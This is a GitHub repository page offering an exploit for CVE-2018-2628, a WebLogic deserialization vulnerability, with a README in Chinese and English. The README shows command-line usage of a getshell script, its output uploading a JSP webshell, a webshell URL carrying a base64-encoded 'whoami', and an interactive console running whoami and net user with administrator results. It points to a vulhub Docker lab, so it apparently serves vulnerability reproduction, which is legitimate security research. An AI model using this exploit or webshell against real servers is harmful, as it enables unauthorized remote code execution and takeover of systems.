Skip to content

jas502n/CVE-2018-2628

master
Switch branches/tags

Name already in use

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?
1 branch 0 tags
Code

Latest commit

 

Git stats

Files

Permalink
Failed to load latest commit information.
Type
Name
Latest commit message
Commit time
images
update
June 5, 2018 19:10
CVE-2018-2628-Getshell.py
Add files via upload
April 20, 2019 03:09
CVE-2018-2628-poc.py
Update CVE-2018-2628-poc.py
April 20, 2019 00:00
README.md
Update README.md
September 30, 2019 09:18
curl-shell.jpg
Add files via upload
April 20, 2019 03:06
cve-2018-2628-docker.jpg
update
October 7, 2018 17:15
cve-2018-2628-poc.jpg
update
October 7, 2018 17:15
cve-2018-2628.py
update
June 5, 2018 19:24
getshell.jpg
Add files via upload
April 20, 2019 03:06
push.sh
update
June 5, 2018 19:10
wlscmd.jsp
Add files via upload
April 20, 2019 03:24
CVE-2018-2628 WebLogic反序列化漏洞复现 weblogic getshell python-poc The Docker In Here! https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.md 0x01 Nessus Scan 0x02 K8 Tools GetShell 0x03 CMD Query Use-Method:

README.md

CVE-2018-2628 WebLogic反序列化漏洞复现

weblogic getshell

python CVE-2018-2628-Getshell.py ip port shell1.jsp

C:\Users\CTF\Desktop>python CVE-2018-2628-Getshell.py  10.10.20.166 7001 jason1.jsp

   _______      ________    ___   ___  __  ___      ___   __ ___   ___
  / ____\ \    / /  ____|  |__ \ / _ \/_ |/ _ \    |__ \ / /|__ \ / _ \
 | |     \ \  / /| |__ ______ ) | | | || | (_) |_____ ) / /_   ) | (_) |
 | |      \ \/ / |  __|______/ /| | | || |> _ <______/ / '_ \ / / > _ <
 | |____   \  /  | |____    / /_| |_| || | (_) |    / /| (_) / /_| (_) |
  \_____|   \/   |______|  |____|\___/ |_|\___/    |____\___/____|\___/


                          Weblogic Getshell
                                jas502n


handshake successful


 >>>>usage: python cve-2018-2628.py ip port shell1.jsp



>>>Shell File Upload Dir:

servers\AdminServer\tmp\_WL_internal\bea_wls_internal\9j4dqk\war\jason1.jsp


>>>Getshell: http://10.10.20.166:7001/bea_wls_internal/jason1.jsp?tom=d2hvYW1pCg==

C:\Users\CTF\Desktop>

python-poc

The Docker In Here! https://github.com/vulhub/vulhub/blob/master/weblogic/CVE-2018-2628/README.md

0x01 Nessus Scan

0x02 K8 Tools GetShell

0x03 CMD Query

Use-Method:
> python cve-2018-2628.py

set url :http://xx.xx.xx.xx:8001/bea_wls_internal/wlscmd.jsp
cmd >>: whoami

win-xxx8cb989qh\administrator

cmd >>: net user

\\WIN-XXX8CB989QH 的用户帐户

-------------------------------------------------------------------------------
Administrator            Guest
命令成功完成。

cmd >>:

About

Weblogic 反序列化漏洞(CVE-2018-2628)

Resources

Readme
Activity

Stars

101 stars

Watchers

1 watching

Forks

39 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages